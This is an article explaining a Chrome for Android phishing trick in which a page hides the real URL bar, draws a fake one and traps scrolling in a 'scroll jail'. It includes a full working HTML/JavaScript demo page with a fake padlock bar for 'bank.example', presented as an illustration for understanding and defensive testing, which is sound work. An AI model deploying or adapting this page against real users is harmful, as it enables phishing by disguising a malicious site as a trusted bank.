Security-conscious users are still wary of mobile banking apps, because they cannot easily tell whether the app talks to the bank's servers over an encrypted (TLS) connection. In a web browser, the usual check is the address bar: the padlock and the https scheme are visual cues that the page was loaded over TLS. A banking app has no address bar, since that feature is normally found only in a web browser (and occasionally in a media player such as VLC, where a URL can be entered for playback).
But is the TLS indicator in the address bar a sure-fire way to confirm that a page really is the encrypted page it claims to be? Not always, and especially not in Chrome for Android. By default, Chrome for Android hides the entire URL bar once the user scrolls down the page, handing the whole screen to the web page. This reduces visual clutter, but according to James Fisher, a web developer, it is a serious mistake: once the real bar is gone, a phishing page can draw a fake one in its place.
A second trick builds on the same behavior: the phisher can “game Chrome's design” so that the real address bar never comes back, which prevents the user from ever checking whether they are still on the encrypted page they think they are on. “Normally, when the user scrolls up, Chrome will redisplay the true URL bar. But we can trick Chrome so that it never redisplays the true URL bar. Once Chrome hides the URL bar, we move the entire page content into a ‘scroll jail’ – that is, a new element with overflow:scroll. Then the user thinks they’re scrolling up in the page, but in fact they’re only scrolling up in the scroll jail. Like a dream in Inception, the user believes they’re in their own browser, but they’re actually in a browser within their browser,” explained James Fisher, web developer.
James Fisher's proof-of-concept is published on his website, jameshfisher.com, where he explains how he took a screenshot of Chrome's URL bar while on HSBC's website and used it to build a fake, interactive “inception bar” inside the page. The technique can convince users that they are on WebsiteX when they are really on a malicious WebsiteY.
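To make the scroll-jail mechanism concrete, here is a minimal page that reproduces the structure described above. It is an added illustration written for this article, not James Fisher's code: the screenshot of a real URL bar is replaced by a CSS mock-up showing the placeholder host `bank.example`, the scroll threshold `ARM_AFTER_PX` at which the real bar is assumed to have collapsed is a guess, and `overscroll-behavior: contain` is used to stop the jail's scrolling from chaining back to the document (which would let Chrome redisplay the real bar). Whether it works exactly as described depends on the Chrome for Android version; it is meant for understanding and defensive testing, not for deployment.

```html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Scroll-jail demo (constructed example)</title>
<style>
  html, body { margin: 0; font-family: sans-serif; }
  .article { padding: 16px; line-height: 1.5; }
  /* Tall spacers give the user a reason to scroll, which is what collapses the real URL bar. */
  .spacer { height: 3000px; }
  /* The jail: fixed, fills the viewport, scrolls internally, never lets scrolling reach the document. */
  #jail {
    display: none; position: fixed; inset: 0;
    overflow-y: scroll; overscroll-behavior: contain;
  }
  body.jailed #jail { display: block; }
  /* Fake URL bar drawn with CSS (the PoC used a screenshot of the real bar instead). */
  #fakebar {
    position: sticky; top: 0; height: 56px; background: #f2f2f2;
    border-bottom: 1px solid #ccc; display: flex; align-items: center; padding: 0 12px;
  }
  #fakebar .pill { flex: 1; background: #fff; border-radius: 20px; padding: 8px 12px; color: #222; }
  #fakebar .lock { color: #1a7f37; margin-right: 6px; }
</style>
</head>
<body>
  <!-- Hidden until armed; after arming it sits over the whole viewport. -->
  <div id="jail" aria-hidden="true">
    <div id="fakebar"><div class="pill"><span class="lock">&#128274;</span>bank.example</div></div>
    <div id="jail-inner"></div>
  </div>

  <!-- The visible page. It is moved, as a whole, into the jail once the real bar is gone. -->
  <div id="content" class="article">
    <h1>Constructed demo page</h1>
    <p>Scroll down on Chrome for Android. Once the real URL bar collapses, a fake one appears and the real one never returns.</p>
    <div class="spacer"></div>
  </div>
  <!-- Keeps the document itself tall after #content moves, so Chrome still treats it as scrolled. -->
  <div class="spacer"></div>

<script>
  // Hypothetical threshold: after this many CSS px of document scroll we assume
  // Chrome has collapsed the real URL bar and it is safe to swap in the fake one.
  var ARM_AFTER_PX = 120;
  var armed = false;

  function armJail() {
    if (armed) return;
    armed = true;
    var jail    = document.getElementById('jail');
    var inner   = document.getElementById('jail-inner');
    var fakebar = document.getElementById('fakebar');
    var content = document.getElementById('content');
    var y = window.scrollY;                  // how far the user had scrolled the real document

    inner.appendChild(content);              // move the entire page into the scroll jail
    document.body.classList.add('jailed');   // show the jail over the viewport
    // Keep the content at the same visual position: the fake bar now occupies the top of the jail.
    jail.scrollTop = y + fakebar.offsetHeight;
    // From here on every swipe scrolls #jail, not the document, so Chrome never sees a
    // scroll-up on the page and never redisplays its real URL bar.
  }

  window.addEventListener('scroll', function () {
    if (window.scrollY > ARM_AFTER_PX) armJail();
  }, { passive: true });
</script>
</body>
</html>
```

The important design point for a defender is that nothing in the page can be used to tell the fake bar from the real one: both are just pixels at the top of the screen. The only trustworthy signal would have to come from space the browser never hands to the page, which is exactly the trade-off Fisher describes next.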
“How can you guard yourself against this attack? I don’t really know. I see it as a security flaw in Chrome. But what’s the fix? There’s a trade-off, between maximizing screen space on one hand, and retaining trusted screen space on the other. One compromise would be for Chrome to retain a small amount of screen space above the ‘line of death’ instead of giving up literally all screen space to the web page. Chrome could use this space to signal that ‘the URL bar is currently collapsed’, e.g. by displaying the shadow of an almost-hidden URL bar,” added Fisher.
At the time of writing there is no fix for the bug. Until Google patches the flaw, the suggested workaround is to switch browser, in particular to a non-Blink browser such as Firefox for Android. The same trade-off Fisher describes applies to any mobile browser, so the alternative is only a real improvement if it keeps some trusted screen space for the URL bar instead of giving the whole screen to the page on scroll.